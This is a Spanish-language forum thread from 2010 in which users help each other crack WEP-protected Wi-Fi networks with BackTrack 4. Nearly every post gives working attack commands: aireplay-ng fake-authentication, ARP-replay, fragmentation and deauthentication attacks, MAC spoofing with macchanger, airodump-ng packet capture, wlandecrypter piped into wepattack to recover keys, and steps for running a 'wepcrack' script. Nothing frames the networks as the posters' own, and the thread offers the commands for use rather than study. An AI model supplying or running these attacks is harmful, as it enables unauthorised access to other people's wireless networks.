Autor
|
Tema: ataque 5+2 y1+3 (Leído 8,872 veces)
|
milin99
|
Hola buenas, ahi va una duda al inyectar trafico en BT4 con aireplay en una señal wep que aparece con los datas en 0: -empiezo con el ataque 1+3: -aireplay-ng -1 0 -a bssid -h 00:11:22:33:44:55 mon0 -aireplay-ng -3 -b bssid -h 00:.... mon0 -AQUI NO CONSIGO QUE SUBAN, O LO QUE PRUEBO CON: -aireplay-ng -5 -b bssid -h 00:.. mon0 -aireplay-ng -2 -p0841 -b bssid -c ff:ff:ff:ff:ff:ff -h 00:.. mon0 - COMO SIGUE SIN SUBIR,EMPIEZO A PROBAR COSAS: -aireplay-ng -1 30 -0 1 -e essid -a bssid -h 00:.. mon0 -aireplay-ng -2 -p 0841 -c ff:... -b bssid -h 00:.. mon0(ESTE ATAQUE LO SAQUE DEL FORO DE ALGUIEN QUE LO ACONSEJABA SI FALLABA EL 1+3). -Y por ultimo, ya con la paciencia agotada, empiezo a cruzar ataques entre los que aqui pongo( decir que consegui que subiera una vez, pero no me acuerdo la combinacion ,jeje), así que si alguien puede echar luz a esto AGRADEEECIDO.
|
|
|
|
|
|
|
|
|
milin99
|
ok amigo, voy a probar y ya te cuen, entiendo que los parametros los pongo tal cual estan sin cambiar nada no?, bueno lo dicho, te comento, a devilboy decir que gracias pero no me arranca con bt4, me bajo la aplicacion y cuando le doy al archivo ejecutable no me deja instalarlo, gracias y os comento.
|
|
|
|
|
|
|
Devilboy.Devil
|
ok amigo, voy a probar y ya te cuen, entiendo que los parametros los pongo tal cual estan sin cambiar nada no?, bueno lo dicho, te comento, a devilboy decir que gracias pero no me arranca con bt4, me bajo la aplicacion y cuando le doy al archivo ejecutable no me deja instalarlo, gracias y os comento.
posiblemente tengas que instalar el monodevelop haz lo sig. sudo apt-get install monoDevelop o desde synaptic
|
|
|
|
|
|
|
dvdr
|
mira si no tienes interned prueva a meterlo en un usb los paquetes wlandecrypter y wepattack aver si se instala eso no lo intente yo nunca alomejor te va y si llegas a instalarlo con 1data que te consigas tendras la clave o 4como mucho wlandecrypter ESSID WLAN_XX | wepattack -f *.cap la verdad esque no seme ocurre nada 
|
|
|
|
|
|
|
milin99
|
bueno. ahi va otro lio: -metiendo los comandos que me facilita el compi dvdr, sale lo siguiente, mejor empiezo detallando uno por uno y si la pinto pues me corregis: -airmon-ng stop wlan0 -ifconfig wlan0 down -macchanger -m 00:11...wlan0 -airmon-ng start wlan0 -airodump-ng --encrypt wep mon0 -airodump-ng -d bssid -c canal -w capturamos.EN.file mon0 -hasta aqui no hay problema -aireplay-ng -1 30 -q120 -e essid -a ap -h 00:::-o(es una o no?) 0 mon0 -seguimos con los datas en cero patatero, en alguna ocasion sale el error "denied (code12), wrong essid or wpa? SI ALGUIEN SABE CUANDO SALE ESTO, ESTARIA BIEN SABERLO, continuamos: -aireplay-ng -3 -b ap -h 00::: mon0 SEGUIMOS EN CERO DATAS, empieza a leer packets, pero ningun arp ni acks ni nada, POR lo que pasamos directamente a fragmentacion: -aireplay-ng -5 -b bssid -h 00:... mon0 ni un miserable data, lo mas que consigo es :saving ARP request in replay arp-xxx-xxxxxx.cap(SI ALGUIEN SABE SI SE PUEDE APROVECHAR ESTE ARCHIVO PARA ALGO, PUES GRACIAS), DE ARCHIVO FRAGMENT NI RASTRO, asi que como soy muy pesao: -aireplay-ng -2 -p 0841 -b bssi -c ff;ff.... -h 00;; mon0 -aireplay-ng -2 -p0841 -m68 -n86 -b bssid -c ff:ff.. -h 00:11... mon0 Y NÁ DE NÁ, asi que si alguien tiene mas metralla le seguimos dando, un saludete.
|
|
|
|
|
|
|
dvdr
|
no entiendo que as hecho hay es wep o wpa la que quieres cojer utiliza grim wepa tienes el link del tutorial que subi 
|
|
« Última modificación: 23 Diciembre 2010, 01:25 am por dvdr »
|
|
|
|
|
dvdr
|
bueno la verdad esque me lie con backtrack con una red que tengo y con 0 datas que me salia usa los mismos comandos que tedi y despues de mucho pero de mucho tiempo no empezo a arrancar las datas ...me supongo que algo tiene que ver con que el amigo este navegando asi que debes dejarlo asta que el amigo conecte ---------------------------------------------bueno ase poco tedieron un post que probe y ba ala perfaccion y es comodo yo no lo sabia pero lo e usado y va como la seda y es rapidimo   tu problema es que no lo puedes meter en el linux no pasa nada me ocurria lo mismo cojete el paquete de wepcrack y lo descomprime en el escritorio --osea --estraer aqui y te saldra una carpeta
habres una consola y pones esto:
cd WepCrack
chmod +x wepcrack
sh wepcrack
y bueno ya te abra saltado el programa y nada mas salu2
|
|
« Última modificación: 24 Diciembre 2010, 16:52 pm por dvdr »
|
|
|
|
|
milin99
|
Es que otro problema que me da es que no me deja usar ningun programa dentro de bt4, se me abre una ventana en ingles que me dice "abrir con" y cuando selecciono cualquier opcion me pide una clave...lo dicho en cuanto pruebe bt4 r1 te digo algo compi, saludos.
|
|
|
|
|
|
|
|
|